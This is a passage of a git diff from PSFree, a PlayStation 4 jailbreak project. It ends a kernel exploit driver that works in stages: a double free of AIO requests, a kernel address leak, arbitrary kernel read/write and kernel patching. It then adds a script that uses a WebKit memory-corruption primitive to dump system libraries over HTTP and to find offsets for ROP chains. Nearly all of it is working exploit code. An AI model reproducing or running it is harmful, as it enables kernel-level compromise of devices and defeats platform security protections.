+ log(`main_mask: ${main_mask}`);
+
+ log("setting main thread's priority");
+ sysi('rtprio_thread', RTP_SET, 0, rtprio.addr);
+
+ const [block_fd, unblock_fd] = (() => {
+ const unix_pair = new View4(2);
+ sysi('socketpair', AF_UNIX, SOCK_STREAM, 0, unix_pair.addr);
+ return unix_pair;
+ })();
+
+ const sds = [];
+ for (let i = 0; i < num_sds; i++) {
+ sds.push(new_socket());
+ }
+
+ let block_id = null;
+ let groom_ids = null;
+ try {
+ log('STAGE: Setup');
+ [block_id, groom_ids] = setup(block_fd);
+
+ log('\nSTAGE: Double free AIO queue entry');
+ const sd_pair = double_free_reqs2(sds);
+
+ log('\nSTAGE: Leak kernel addresses');
+ const [
+ reqs1_addr, kbuf_addr, kernel_addr, target_id, evf,
+ ] = leak_kernel_addrs(sd_pair);
+
+ log('\nSTAGE: Double free SceKernelAioRWRequest');
+ const [pktopts_sds, dirty_sd] = double_free_reqs1(
+ reqs1_addr, kbuf_addr, target_id, evf, sd_pair[0], sds,
+ );
+
+ log('\nSTAGE: Get arbitrary kernel read/write');
+ const [kbase, kmem, p_ucred, restore_info] = make_kernel_arw(
+ pktopts_sds, dirty_sd, reqs1_addr, kernel_addr, sds);
+
+ log('\nSTAGE: Patch kernel');
+ await patch_kernel(kbase, kmem, p_ucred, restore_info);
+ } finally {
+ close(unblock_fd);
+
+ const t2 = performance.now();
+ const ftime = t2 - t1;
+ const init_time = _init_t2 - _init_t1;
+ log('\ntime (include init): ' + (ftime) / 1000);
+ log('kex time: ' + (t2 - _init_t2) / 1000);
+ log('init time: ' + (init_time) / 1000);
+ log('time to init: ' + (_init_t1 - t1) / 1000);
+ log('time - init time: ' + (ftime - init_time) / 1000);
+ }
+ close(block_fd);
+ free_aios2(groom_ids.addr, groom_ids.length);
+ aio_multi_wait(block_id.addr, 1);
+ aio_multi_delete(block_id.addr, block_id.length);
+ for (const sd of sds) {
+ close(sd);
+ }
+}
+kexploit();
diff --git a/src/send.mjs b/src/send.mjs
new file mode 100644
index 0000000..508700e
--- /dev/null
+++ b/src/send.mjs
@@ -0,0 +1,231 @@
+/* Copyright (C) 2024-2025 anonymous
+
+This file is part of PSFree.
+
+PSFree is free software: you can redistribute it and/or modify
+it under the terms of the GNU Affero General Public License as
+published by the Free Software Foundation, either version 3 of the
+License, or (at your option) any later version.
+
+PSFree is distributed in the hope that it will be useful,
+but WITHOUT ANY WARRANTY; without even the implied warranty of
+MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+GNU Affero General Public License for more details.
+
+You should have received a copy of the GNU Affero General Public License
+along with this program. If not, see . */
+
+// script for dumping libSceNKWebKit.sprx, libkernel_web.sprx, and
+// libSceLibcInternal.sprx
+
+// This script is for firmware 8.0x. You need to port this to your firmware if
+// you want to use it. It only dumps the .text and PT_SCE_RELRO segments. It
+// doesn't dump the entire ELF file.
+//
+// There's also some miscellaneous functions to dump functions from WebKit that
+// were studied during the development of PSFree.
+
+// libkernel libraries contain syscalls
+// syscalls are enforced to be called from these libraries
+//
+// libkernel_web.sprx is used by the browser in firmwares >= 6.00
+// libkernel.sprx for firmwares below
+//
+// libkernel_sys.sprx contains syscalls that aren't found in the others, such
+// as mount and nmount
+//
+// the BD-J app uses libkernel_sys.sprx for example
+
+// Porting HOWTO:
+//
+// You can only dump the WebKit module (libSceNKWebKit.sprx for FW >= 6.00,
+// else libSceWebkit2.sprx) initially via dump_libwebkit() on any firmware.
+// We'll use the WebKit dump to search for imported functions from libkernel
+// and LibcInternal. Once we resolve the imports, we can use find_base() to get
+// the boundaries of these modules.
+//
+// Most of the work is done for you at dump_lib*(). You just need to find the
+// offset of the imported functions relative to WebKit's base address.
+//
+// import candidates:
+//
+// __stack_chk_fail() is a good import from libkernel to search for as it's
+// easy to find since most functions are protected by a stack canary.
+//
+// For a LibcInternal import we searched for strlen() but you can search for
+// any libc function such as memcpy().
+
+import * as config from './config.mjs';
+
+import { Int } from './module/int64.mjs';
+import { Addr, mem } from './module/mem.mjs';
+import { make_buffer, find_base, resolve_import } from './module/memtools.mjs';
+import { KB, MB } from './module/offset.mjs';
+
+import {
+ log,
+ align,
+ die,
+ send,
+} from './module/utils.mjs';
+
+import * as rw from './module/rw.mjs';
+import * as o from './module/offset.mjs';
+
+const origin = window.origin;
+const port = '8000';
+const url = `${origin}:${port}`;
+
+const textarea = document.createElement('textarea');
+// JSObject
+const js_textarea = mem.addrof(textarea);
+
+// boundaries of the .text + PT_SCE_RELRO portion of a module
+function get_boundaries(leak) {
+ const lib_base = find_base(leak, true, true);
+ const lib_end = find_base(leak, false, false);
+
+ return [lib_base, lib_end]
+}
+
+// dump a module's .text and PT_SCE_RELRO segments only
+function dump(name, lib_base, lib_end) {
+ // assumed size < 4GB
+ const lib_size = lib_end.sub(lib_base).lo;
+ log(`${name} base: ${lib_base}`);
+ log(`${name} size: ${lib_size}`);
+ const lib = make_buffer(
+ lib_base,
+ lib_size
+ );
+ send(
+ url,
+ lib,
+ `${name}.sprx.text_${lib_base}.bin`,
+ () => log(`${name} sent`)
+ );
+}
+
+// dump for libSceNKWebKit.sprx
+function dump_libwebkit() {
+ let addr = js_textarea;
+ // WebCore::HTMLTextAreaElement
+ addr = addr.readp(0x18);
+
+ // vtable for WebCore::HTMLTextAreaElement
+ // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
+ addr = addr.readp(0);
+
+ log(`vtable: ${addr}`);
+ const vtable = make_buffer(addr, 0x400);
+ send(url, vtable, `vtable_${addr}.bin`, () => log('vtable sent'));
+
+ const [lib_base, lib_end] = get_boundaries(addr);
+ dump('libSceNKWebKit', lib_base, lib_end);
+
+ return lib_base;
+}
+
+// dump for libkernel_web.sprx
+function dump_libkernel(libwebkit_base) {
+ const offset = 0x8d8;
+ const vtable_p = js_textarea.readp(0x18).readp(0);
+ // __stack_chk_fail
+ const stack_chk_fail_import = libwebkit_base.add(offset);
+
+ const libkernel_leak = resolve_import(stack_chk_fail_import);
+ log(`__stack_chk_fail import: ${libkernel_leak}`);
+
+ const [lib_base, lib_end] = get_boundaries(libkernel_leak);
+ dump('libkernel_web', lib_base, lib_end);
+}
+
+// dump for libSceLibcInternal.sprx
+function dump_libc(libwebkit_base) {
+ const offset = 0x918;
+ const vtable_p = js_textarea.readp(0x18).readp(0);
+ // strlen
+ const strlen_import = libwebkit_base.add(offset);
+
+ const libc_leak = resolve_import(strlen_import);
+ log(`strlen import: ${libc_leak}`);
+
+ const [lib_base, lib_end] = get_boundaries(libc_leak);
+ dump('libSceLibcInternal', lib_base, lib_end);
+}
+
+function dump_webkit() {
+ const libwebkit_base = dump_libwebkit();
+ dump_libkernel(libwebkit_base);
+ dump_libc(libwebkit_base);
+}
+
+// See globalFuncEval() from
+// WebKit/Source/JavaScriptCore/runtime/JSGlobalObjectFunctions.cpp at PS4
+// 8.03.
+//
+// Used to dump the implementation of eval() to figure out the expression
+// "execState.argument(0)".
+//
+// eval()'s native function receives a JSC::ExecState pointer (renamed to
+// JSC::CallFrame on webkitgtk 2.34.4). That type has an argument() method
+// which takes an index and returns the corresponding JSValue passed to eval(),
+// e.g. execState.argument(0) is the first JSValue argument.
+//
+// execState.argument(0) evaluates to *(&execState + argumentOffset + 0).
+// Knowing the argumentOffset is useful for passing data to ROP chains.
+// argumentOffset is 0x30 for PS4 8.03.
+//
+// The PS4 uses the System V ABI. The ExecState pointer is passed to the rdi
+// register since it is the first argument. ROP chains can get the JSValue
+// passed via *(rdi + 0x30).
+//
+// For example, the expression "eval(1)" has the JSValue encoding of 1 passed
+// to *(rdi + 0x30).
+function dump_eval() {
+ let addr = js_textarea;
+ // WebCore::HTMLTextAreaElement
+ addr = addr.readp(0x18);
+
+ // vtable for WebCore::HTMLTextAreaElement
+ // in PT_SCE_RELRO segment (p_type = 0x6100_0010)
+ addr = addr.readp(0);
+
+ const libwebkit_base = find_base(addr, true, true);
+ const impl = mem.addrof(eval).readp(0x18).readp(0x38);
+ const offset = impl.sub(libwebkit_base);
+ send(
+ url,
+ make_buffer(impl, 0x800),
+ `eval_dump_offset_${offset}.bin`,
+ () => log('sent')
+ );
+}
+
+// Initially we just used the vtable offset from pOOBs4 (0x1c8) and tested if
+// it works. It did but let's add this dumper so we can verify it another way.
+// See howto_code_exec.txt about code execution via the vtable of a textarea
+// element.
+function dump_scrollLeft() {
+ let proto = Object.getPrototypeOf(textarea);
+ proto = Object.getPrototypeOf(proto);
+ proto = Object.getPrototypeOf(proto);
+
+ const scrollLeft_get =
+ Object.getOwnPropertyDescriptors(proto).scrollLeft.get
+ ;
+
+ // get the JSCustomGetterSetterFunction
+ const js_func = mem.addrof(scrollLeft_get);
+ const getterSetter = js_func.readp(0x28);
+ const getter = getterSetter.readp(8);
+
+ const libwebkit_base = find_base(getter, true, true);
+ const offset = getter.sub(libwebkit_base);
+ send(
+ url,
+ make_buffer(getter, 0x800),
+ `scrollLeft_getter_dump_offset_${offset}.bin`,
+ () => log('sent')
+ );
+}